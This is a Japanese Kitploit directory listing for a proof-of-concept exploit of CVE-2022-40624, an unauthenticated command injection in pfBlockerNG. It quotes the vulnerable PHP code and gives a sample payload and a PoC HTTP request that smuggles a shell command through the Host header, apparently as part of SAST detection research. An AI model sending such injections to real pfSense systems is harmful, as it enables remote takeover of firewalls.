Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
pfBlockerNg-CVE-2022-40624 — pfBlockerNgのDNSBL TLDクエリ関数における未サニタイズ入力による未認証リモートコード実行の概念実証エクスプロイト。SAST検出分析付き。 | Kitploit
ツール/GitHubGitHub/dhammon/pfblockerng-cve-2022-40624
脆弱性分析コード分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育
GitHubdhammon/pfblockerng-cve-2022-40624

pfBlockerNg-CVE-2022-40624

pfBlockerNgのDNSBL TLDクエリ関数における未サニタイズ入力による未認証リモートコード実行の概念実証エクスプロイト。SAST検出分析付き。

リポジトリを見る
223年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

pfBlockerNg-CVE-2022-40624

背景

pfBlockerNG は、以下の機能を備えた pfBlocker の次世代版です。

  1. IPv4/v6 リストソースを「拒否 (Deny)、許可 (Permit)、一致 (Match)」形式で管理します。
  2. MaxMind Inc. による GeoIP データベース (GeoLite2 無料版)。
  3. 重複排除 (De-Duplication)、抑止 (Suppression)、およびレピュテーション (Reputation) の拡張。
  4. 多様なリスト形式からのダウンロード機能。
  5. Proofpoint ET IQRisk IP レピュテーション脅威ソースの高度な統合。
  6. Unbound DNS リゾルバーによるドメイン名 (DNSBL) ブロック。

https://docs.netgate.com/pfsense/en/latest/packages/pfblocker.html

影響を受けるバージョン

pfBlockerNg <2.1.4_27

脆弱性

未認証のリモートコード実行 (RCE)

index.php の TLD ブロックセクションのクエリには、HEADER の Host ソースからのサニタイズ/エスケープされていないユーザー入力 d_query が PHP の exec 関数シンクに含まれています。

exec("/usr/bin/grep -l '^{$d_query}$' /var/db/pfblockerng/dnsblalias/DNSBL_TLD", $match);

/pfblockerng/www/index.php

root@kitploit:~
// Query for a TLD Block
if (empty($pfb_query)) {
	$idparts	= explode('.', $query);
	$idcnt		= (count($idparts) -1);

	for ($i=1; $i <= $idcnt; $i++) {
		$d_query = implode('.', array_slice($idparts, -$i, $i, TRUE));
		exec("/usr/bin/grep -l '^{$d_query}$' /var/db/pfblockerng/dnsblalias/DNSBL_TLD", $match);

		if (!empty($match[0])) {
			$pfb_query = 'DNSBL_TLD';
			break;
		}
	}
}

悪用

pfsense Web コンソールへの HTTP アクセスが必要です。 サンプルペイロード: ' *; sleep 5; '

POC リクエスト:

root@kitploit:~
GET /pfblockerng/www/index.php HTTP/1.1
Host: test.test2' *; sleep 5; '
Content-Length: 2

インスピレーション

私は pfBlockerNg が大好きで、Di r00t 氏による最近の CVE-2022-31814 と素晴らしい記事 https://www.ihteam.net/advisory/pfblockerng-unauth-rce-vulnerability/ に触発され、Snyk 静的アプリケーションセキュリティテスト (SAST) ツールがこの脆弱性を検出できるかどうか気になりました。そこで、対応する index.php バージョン 2.1.4_26 ファイルをダウンロードし、Snyk Code で実行しました。案の定、Snyk はこの脆弱性と、ほんの数行後にもう 1 つの類似のレポートを検出しました。

ツールをダウンロード